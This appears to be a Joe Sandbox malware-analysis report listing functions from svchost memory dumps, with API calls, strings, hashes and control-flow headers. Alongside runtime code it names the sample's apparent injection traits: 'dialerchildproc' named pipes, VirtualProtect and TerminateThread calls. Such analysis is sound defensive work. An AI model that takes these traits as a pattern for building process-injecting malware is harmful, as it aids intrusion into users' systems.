                                                        • Snapshot File: hcaresult_46_2_17953770000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                        • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                                                        • API String ID: 190073905-1786718095
                                                        • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                        • Instruction ID: e41be534229163122c3179cc1025da5169d2b8c0ede0d6324f4ee0300e7142a4
                                                        • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                        • Instruction Fuzzy Hash: BB81F772F1C26186F657AB2594413D967F0E78778CF548527AA0C8379FDB38C84D8B08

                                                        Control-flow Graph

                                                        APIs
                                                        • GetLastError.KERNEL32 ref: 00000179537ACE37
                                                        • FlsGetValue.KERNEL32(?,?,?,00000179537B0A6B,?,?,?,00000179537B045C,?,?,?,00000179537AC84F), ref: 00000179537ACE4C
                                                        • FlsSetValue.KERNEL32(?,?,?,00000179537B0A6B,?,?,?,00000179537B045C,?,?,?,00000179537AC84F), ref: 00000179537ACE6D
                                                        • FlsSetValue.KERNEL32(?,?,?,00000179537B0A6B,?,?,?,00000179537B045C,?,?,?,00000179537AC84F), ref: 00000179537ACE9A
                                                        • FlsSetValue.KERNEL32(?,?,?,00000179537B0A6B,?,?,?,00000179537B045C,?,?,?,00000179537AC84F), ref: 00000179537ACEAB
                                                        • FlsSetValue.KERNEL32(?,?,?,00000179537B0A6B,?,?,?,00000179537B045C,?,?,?,00000179537AC84F), ref: 00000179537ACEBC
                                                        • SetLastError.KERNEL32 ref: 00000179537ACED7
                                                        • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,00000179537B0A6B,?,?,?,00000179537B045C,?,?,?,00000179537AC84F), ref: 00000179537ACF0D
                                                        • FlsSetValue.KERNEL32(?,?,00000001,00000179537AECCC,?,?,?,?,00000179537ABF9F,?,?,?,?,?,00000179537A7AB0), ref: 00000179537ACF2C
                                                          • Part of subcall function 00000179537AD6CC: HeapAlloc.KERNEL32 ref: 00000179537AD721
                                                        • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000179537B0A6B,?,?,?,00000179537B045C,?,?,?,00000179537AC84F), ref: 00000179537ACF54
                                                          • Part of subcall function 00000179537AD744: HeapFree.KERNEL32 ref: 00000179537AD75A
                                                          • Part of subcall function 00000179537AD744: GetLastError.KERNEL32 ref: 00000179537AD764
                                                        • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000179537B0A6B,?,?,?,00000179537B045C,?,?,?,00000179537AC84F), ref: 00000179537ACF65
                                                        • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000179537B0A6B,?,?,?,00000179537B045C,?,?,?,00000179537AC84F), ref: 00000179537ACF76
                                                        Memory Dump Source
                                                        • Source File: 0000002E.00000002.3134958889.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_46_2_179537a0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Value$ErrorLast$Heap$AllocFree
                                                        • String ID:
                                                        • API String ID: 570795689-0
                                                        • Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                        • Instruction ID: 77b7efc725698ca54b94f8a3bbd63b6bf6571e27a76a959dc314b8d8e9e59c42
                                                        • Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                        • Instruction Fuzzy Hash: FA41D370F2C27951FA2BA73149553E923B15B477BCF1C4737A83E867DADE28C4494200

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002E.00000002.3134958889.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_46_2_179537a0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                        • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                        • API String ID: 2171963597-1373409510
                                                        • Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                        • Instruction ID: bf197e0ffd1960bdac6007c57ce7df944ff2740a99a669adc726ba4408a275dc
                                                        • Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                        • Instruction Fuzzy Hash: 06214F32A1876482FB118B25F45479973B1F78ABA8F504216EB9D03BA8DF3CC14DCB04

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002E.00000002.3134494005.0000017953770000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017953770000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_46_2_17953770000_svchost.jbxd
                                                        Similarity
                                                        • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                        • String ID: csm$csm$csm
                                                        • API String ID: 849930591-393685449
                                                        • Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                        • Instruction ID: c1e37324251eb8afeee7f02a8d197e06ab5e66d9bdec95cbde6af93207a2d4f1
                                                        • Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                        • Instruction Fuzzy Hash: 68E18972A0ABA08AEB629B65D4813DD77F0F747B9CF100116EE8D57B9ACB34D499C700

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002E.00000002.3134958889.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_46_2_179537a0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                        • String ID: csm$csm$csm
                                                        • API String ID: 849930591-393685449
                                                        • Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                        • Instruction ID: 48bad793c3cf8a064d8991e65e6d6caa703c72e63802b69e7c4d4fa44d5e9957
                                                        • Opcode Fuzzy Hash: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                        • Instruction Fuzzy Hash: DCE18E72A28BA48AEBA2DF65D4803DD77B0F746B9CF100116EE8D57B95CB34C599CB00
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002E.00000002.3134958889.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_46_2_179537a0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: AddressFreeLibraryProc
                                                        • String ID: api-ms-$ext-ms-
                                                        • API String ID: 3013587201-537541572
                                                        • Opcode ID: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                        • Instruction ID: 6d28e7484422e4a57a06ac6147cde09464f9819a0b3aea55b6358727e73b2730
                                                        • Opcode Fuzzy Hash: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                        • Instruction Fuzzy Hash: 3C41B532B2DA2091FB17DB66AC147D523B1BB46BA8F1941279D2E87784EF38C44DC324
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002E.00000002.3134958889.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_46_2_179537a0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                        • String ID: d
                                                        • API String ID: 3743429067-2564639436
                                                        • Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                        • Instruction ID: 4d0dabdc3bb95f01b52548fecc3f9169e00d7fa873fa5b6aedad960dda8fc516
                                                        • Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                        • Instruction Fuzzy Hash: 8E416C73618B94C6E761CF21E45479A77B1F389B9CF44812AEB8947B58EF38C489CB00
                                                        APIs
                                                        • FlsGetValue.KERNEL32(?,?,?,00000179537AC7DE,?,?,?,?,?,?,?,?,00000179537ACF9D,?,?,00000001), ref: 00000179537AD087
                                                        • FlsSetValue.KERNEL32(?,?,?,00000179537AC7DE,?,?,?,?,?,?,?,?,00000179537ACF9D,?,?,00000001), ref: 00000179537AD0A6
                                                        • FlsSetValue.KERNEL32(?,?,?,00000179537AC7DE,?,?,?,?,?,?,?,?,00000179537ACF9D,?,?,00000001), ref: 00000179537AD0CE
                                                        • FlsSetValue.KERNEL32(?,?,?,00000179537AC7DE,?,?,?,?,?,?,?,?,00000179537ACF9D,?,?,00000001), ref: 00000179537AD0DF
                                                        • FlsSetValue.KERNEL32(?,?,?,00000179537AC7DE,?,?,?,?,?,?,?,?,00000179537ACF9D,?,?,00000001), ref: 00000179537AD0F0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002E.00000002.3134958889.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_46_2_179537a0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Value
                                                        • String ID: 1%$Y%
                                                        • API String ID: 3702945584-1395475152
                                                        • Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                        • Instruction ID: b0a3c49dc6ef7a53409216961fbfbc30d008a76d59ac91324fc92d9a86fd0cd9
                                                        • Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                        • Instruction Fuzzy Hash: C311C870F2C26841FA6B673699613EA63715B473FCF144337A83D477EADE28C54A8200
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000002E.00000002.3134958889.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_46_2_179537a0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                        • String ID:
                                                        • API String ID: 190073905-0
                                                        • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                        • Instruction ID: 03549ce5a8bfb50d1d2883e7ce9a3f420bf030cad668bfca8cca14f47c08375e
                                                        • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                        • Instruction Fuzzy Hash: CD81B531E2C2E146FB57ABA994513D923F2AB4778CF5444A7EA4CC7796EB38C44D8700
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002E.00000002.3134958889.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_46_2_179537a0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Library$Load$AddressErrorFreeLastProc
                                                        • String ID: api-ms-
                                                        • API String ID: 2559590344-2084034818
                                                        • Opcode ID: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                        • Instruction ID: 1c35a6318a95a9f66357ff113d1e6293aa460ab4329f98c61122d8ffc54845e1
                                                        • Opcode Fuzzy Hash: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                        • Instruction Fuzzy Hash: 5731D832B2E664E1EE13DB02A400BD963F4B74BBA8F5905279D5E47791EF38C45D8300
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002E.00000002.3134958889.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_46_2_179537a0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                        • String ID: CONOUT$
                                                        • API String ID: 3230265001-3130406586
                                                        • Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                        • Instruction ID: 1d5e788c20f4153e52296bcb8cadabdf0028e11074e208d04bdcdd6a952d3e19
                                                        • Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                        • Instruction Fuzzy Hash: 1C11C431B18BA482F7518B52E864359B3B4F389FE8F044226EA9E87794EF38C4488744
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002E.00000002.3134958889.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_46_2_179537a0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CurrentProcessProtectVirtual$HandleModule
                                                        • String ID: wr
                                                        • API String ID: 1092925422-2678910430
                                                        • Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                        • Instruction ID: 5fea20ec1214d5790932143d42f439680bcd659adb70575157f6ec8973a68838
                                                        • Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                        • Instruction Fuzzy Hash: 76115E36B1875582FF159F52E4186A963B4FB4AB89F44002ADF8D07B54EF3DC509C714
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000002E.00000002.3134958889.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_46_2_179537a0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Value$ErrorLast
                                                        • String ID:
                                                        • API String ID: 2506987500-0
                                                        • Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                        • Instruction ID: 8609c7cee23a4da2cb73d7b9a2e9104af3180433e72c296c04d1e0e8fdc5031b
                                                        • Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                        • Instruction Fuzzy Hash: C811A270B2C26881FA2BA73259653E923715B477FCF144327A83E477DAEE28C5499200
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000002E.00000002.3134958889.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_46_2_179537a0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                        • String ID:
                                                        • API String ID: 517849248-0
                                                        • Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                        • Instruction ID: 56b2cd84fcc0e7ced0197c83fadfe9882c07905c38d9d912c2a518943b9c5019
                                                        • Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                        • Instruction Fuzzy Hash: 51016931B08A5482FB11DB52A8A879963B5F789BC8F888036DE8D43754EF3CC98DC704
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000002E.00000002.3134958889.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_46_2_179537a0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                        • String ID:
                                                        • API String ID: 449555515-0
                                                        • Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                        • Instruction ID: d2470d701e98e81108f06155ee65d957e7b349e728d52e6fd90ae972be3b8938
                                                        • Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                        • Instruction Fuzzy Hash: DD012D75B1975882FF269B62E86879573B0FB5AB8AF04042ACE8D07754EF3DC50C8704
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002E.00000002.3134958889.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_46_2_179537a0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                        • String ID: csm$f
                                                        • API String ID: 2395640692-629598281
                                                        • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                        • Instruction ID: 523c0386b4c626f6db8f57a49f1f760a6df895bac009b115f0e0608c5af323b5
                                                        • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                        • Instruction Fuzzy Hash: 0E51B232B2962886EB56DF15E448B9D37B6F347B8CF108126DA0E47788EB75CC59C704
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002E.00000002.3134958889.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_46_2_179537a0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                        • String ID: csm$f
                                                        • API String ID: 2395640692-629598281
                                                        • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                        • Instruction ID: 296e92441388b6fc06103b0115ebcdacb288d64441a59e498690bc521cbf3a7d
                                                        • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                        • Instruction Fuzzy Hash: 5531E032A2866896E716DF21E84879E37B4F743BCCF148016EE4E43788DB39C968C704
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002E.00000002.3134958889.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_46_2_179537a0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: FinalHandleNamePathlstrlen
                                                        • String ID: \\?\
                                                        • API String ID: 2719912262-4282027825
                                                        • Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                        • Instruction ID: de33d0b7403191fafe040a8392dc9819e369d541baf2522363be2d8de6ed28d3
                                                        • Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                        • Instruction Fuzzy Hash: 65F03C72B1865592FB618F21E8D479A6771F749B8CF848022DA8D46A58EB2CC68DCB00
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002E.00000002.3134958889.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_46_2_179537a0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                        • String ID: CorExitProcess$mscoree.dll
                                                        • API String ID: 4061214504-1276376045
                                                        • Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                        • Instruction ID: f286dd60a5522db936dfed800217cc6c1f6d92c6ac24c710919bdd42c6a300c2
                                                        • Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                        • Instruction Fuzzy Hash: 83F09671B2971481FB158B29E8647D96370EB8AB69F54021BCAAE463E4EF3CC44CC300
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002E.00000002.3134958889.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_46_2_179537a0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CombinePath
                                                        • String ID: \\.\pipe\
                                                        • API String ID: 3422762182-91387939
                                                        • Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                        • Instruction ID: bfab23f09705f7b99784b468b9aa13085e235c3ca8d88f22da8ea4acb8ae1034
                                                        • Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                        • Instruction Fuzzy Hash: 55F05E70A18BA482EA418F52B92419A6371EB4EFC8F044032EE8E07B18EE3CC4498714
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000002E.00000002.3134958889.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_46_2_179537a0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CurrentThread
                                                        • String ID:
                                                        • API String ID: 2882836952-0
                                                        • Opcode ID: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                        • Instruction ID: 898435458d9111b53b1cdb683c1f8426028e1d60795762d314f968d6b34372fa
                                                        • Opcode Fuzzy Hash: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                        • Instruction Fuzzy Hash: EE02A73262DB9486E7A1CB55E49039AB7B1F3C5798F104116EACE87BA9DF7CC458CB00
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000002E.00000002.3134494005.0000017953770000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017953770000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_46_2_17953770000_svchost.jbxd
                                                        Similarity
                                                        • API ID: _set_statfp
                                                        • String ID:
                                                        • API String ID: 1156100317-0
                                                        • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                        • Instruction ID: 3cc9218a8b4e95386c2da3f1349016e86a73989eeb7d6784e7c61b0fa2066005
                                                        • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                        • Instruction Fuzzy Hash: F511A73AE1DA3111FA5715FCE4413E993E0EB5B37CF48472BA97E067DACA68C84D4100
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000002E.00000002.3134958889.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_46_2_179537a0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: _set_statfp
                                                        • String ID:
                                                        • API String ID: 1156100317-0
                                                        • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                        • Instruction ID: 1a93a27212db14d107c445d7083ca94b3231e77f583d31af7090b27211639dc1
                                                        • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                        • Instruction Fuzzy Hash: 16110632E1CF7821F666156AD4753E513706B7B3BCF080626A97E077D6FB24C8AC5211
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002E.00000002.3134494005.0000017953770000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017953770000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_46_2_17953770000_svchost.jbxd
                                                        Similarity
                                                        • API ID: _invalid_parameter_noinfo
                                                        • String ID: Tuesday$Wednesday$or copy constructor iterator'
                                                        • API String ID: 3215553584-4202648911
                                                        • Opcode ID: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                        • Instruction ID: 7ae5aeff7bedc3f2e07649f4cc5b94845739e1ebc3c2fb1e68247ee672dcd3a0
                                                        • Opcode Fuzzy Hash: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                        • Instruction Fuzzy Hash: AE619F32E0C66482FA67DB68E6443EE6BF0E78774CF554517CA2E177A4DA34C84AC220
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002E.00000002.3134958889.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_46_2_179537a0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CallEncodePointerTranslator
                                                        • String ID: MOC$RCC
                                                        • API String ID: 3544855599-2084237596
                                                        • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                        • Instruction ID: 3a2af3483e4300a1187523e9586c3a768ce971fdbc56a475376103612aa46848
                                                        • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                        • Instruction Fuzzy Hash: CD613632A19B988AEB619F69D4803DD77B0F74AB8CF144216EE4D17B98DB38C599C700
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002E.00000002.3134494005.0000017953770000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017953770000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_46_2_17953770000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                        • String ID: csm$csm
                                                        • API String ID: 3896166516-3733052814
                                                        • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                        • Instruction ID: 8b5f16ec00f45c4a7ced28edb1d3fb9ff7d8c5f0b459b66f842ca35e7ccd5795
                                                        • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                        • Instruction Fuzzy Hash: C2517032908AA0CAFBA68F25954439877F0F39AB98F185117EF5D87BD5CB38D468C700
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002E.00000002.3134958889.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_46_2_179537a0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                        • String ID: csm$csm
                                                        • API String ID: 3896166516-3733052814
                                                        • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                        • Instruction ID: 643f0b19000955fd4531acc435b5a4dff8720e58fb8e76c4df4d970b4f056407
                                                        • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                        • Instruction Fuzzy Hash: 4F51B072928BA0CAEBB98F25948439D77B0F756B8DF184117DA9D47BD9CB38C468C700
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002E.00000002.3134494005.0000017953770000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017953770000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_46_2_17953770000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CurrentImageNonwritable__except_validate_context_record
                                                        • String ID: csm$f
                                                        • API String ID: 3242871069-629598281
                                                        • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                        • Instruction ID: 5ac530eb3dc6006a10c07ebfe96c76d79b6a881cc49be52fd1b4b670004edea5
                                                        • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                        • Instruction Fuzzy Hash: 1751BB32A09220AAEB57CF25E405B9837F5F352BDCF518126DA1E43788EB74E949CB04
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002E.00000002.3134494005.0000017953770000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017953770000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_46_2_17953770000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CurrentImageNonwritable__except_validate_context_record
                                                        • String ID: csm$f
                                                        • API String ID: 3242871069-629598281
                                                        • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
